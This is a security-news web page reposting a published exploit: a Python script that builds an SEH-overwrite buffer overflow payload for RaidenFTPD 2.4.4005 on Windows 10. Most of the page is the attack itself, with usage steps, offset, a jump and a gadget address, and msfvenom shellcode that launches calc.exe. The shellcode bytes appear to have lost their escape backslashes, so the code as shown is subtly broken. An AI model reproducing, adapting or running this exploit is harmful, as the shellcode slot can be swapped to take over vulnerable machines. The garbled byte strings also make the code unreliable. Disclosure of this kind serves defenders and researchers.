Home Tools Exploits & CVE's RaidenFTPD 2.4.4005 Buffer Overflow

RaidenFTPD 2.4.4005 Buffer Overflow

July 24, 2023

227

RaidenFTPD version 2.4.4005 suffers from a buffer overflow vulnerability.

# Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
# Date: 18/07/2023
# Exploit Author: Andre Nogueira
# Vendor Homepage: https://www.raidenftpd.com/en/
# Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe
# Version: RaidenFTPD 2.4.4005
# Tested on: Microsoft Windows 10 Build 19045

# 1.- Open RaidenFTPD
# 2.- Click on 'Setup' -> 'Step by step setup wizard'
# 3.- Run python code: exploit-raidenftpd.py
# 4.- Paste the content of exploit-raiden.txt into the field 'Server name'
# 5.- Click 'next' -> 'next' -> 'ok'
# 6.- Pop calc.exe


#!/usr/bin/env python3
from struct import pack

crash = 2000
offset = 497

# msfvenom -p windows/exec CMD="calc.exe" -a x86 -f python -v shellcode --b "x00x0d" 
shellcode =  b"x90" * 8
shellcode += b"xb8x9cx78x14x60xd9xc2xd9x74x24xf4"
shellcode += b"x5ax33xc9xb1x31x83xeaxfcx31x42x0f"
shellcode += b"x03x42x93x9axe1x9cx43xd8x0ax5dx93"
shellcode += b"xbdx83xb8xa2xfdxf0xc9x94xcdx73x9f"
shellcode += b"x18xa5xd6x34xabxcbxfex3bx1cx61xd9"
shellcode += b"x72x9dxdax19x14x1dx21x4exf6x1cxea"
shellcode += b"x83xf7x59x17x69xa5x32x53xdcx5ax37"
shellcode += b"x29xddxd1x0bxbfx65x05xdbxbex44x98"
shellcode += b"x50x99x46x1axb5x91xcex04xdax9cx99"
shellcode += b"xbfx28x6ax18x16x61x93xb7x57x4ex66"
shellcode += b"xc9x90x68x99xbcxe8x8bx24xc7x2exf6"
shellcode += b"xf2x42xb5x50x70xf4x11x61x55x63xd1"
shellcode += b"x6dx12xe7xbdx71xa5x24xb6x8dx2excb"
shellcode += b"x19x04x74xe8xbdx4dx2ex91xe4x2bx81"
shellcode += b"xaexf7x94x7ex0bx73x38x6ax26xdex56"
shellcode += b"x6dxb4x64x14x6dxc6x66x08x06xf7xed"
shellcode += b"xc7x51x08x24xacxaex42x65x84x26x0b"
shellcode += b"xffx95x2axacxd5xd9x52x2fxdcxa1xa0"
shellcode += b"x2fx95xa4xedxf7x45xd4x7ex92x69x4b"
shellcode += b"x7exb7x09x0axecx5bxe0xa9x94xfexfc"

nSEH = b"xebx06x90x90" # short jump of 8 bytes
SEH = pack("<L", 0x7c1e76ff) #  pop eax; pop esi; ret; => msvcp70.dll

buffer = b"A" * offset
buffer += nSEH
buffer += SEH
buffer += shellcode
buffer += b"D" * (crash -len(buffer))

file_payload = open("exploit-raiden.txt", 'wb')
print("[*] Creating the .txt file for out payload")
file_payload.write(buffer)
print("[*] Writing malicious payload to the .txt file")
file_payload.close()

RaidenFTPD 2.4.4005 Buffer Overflow

Follow us on Instagram @thecyberpost

EDITOR PICKS

UnitedHealth CEO confirms company paid $22 million ransom in heated Senate...

Ukrainian sentenced to almost 14 years for infecting thousands with REvil...

Investigation uncovers substantial spyware exports to Indonesia

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Barco wePresent Global Hardcoded Root SSH Password

EgavilanMedia User Registration And Login System With Admin Panel SQL Injection

Windows Credential Guard TGT Renewal Information Disclosure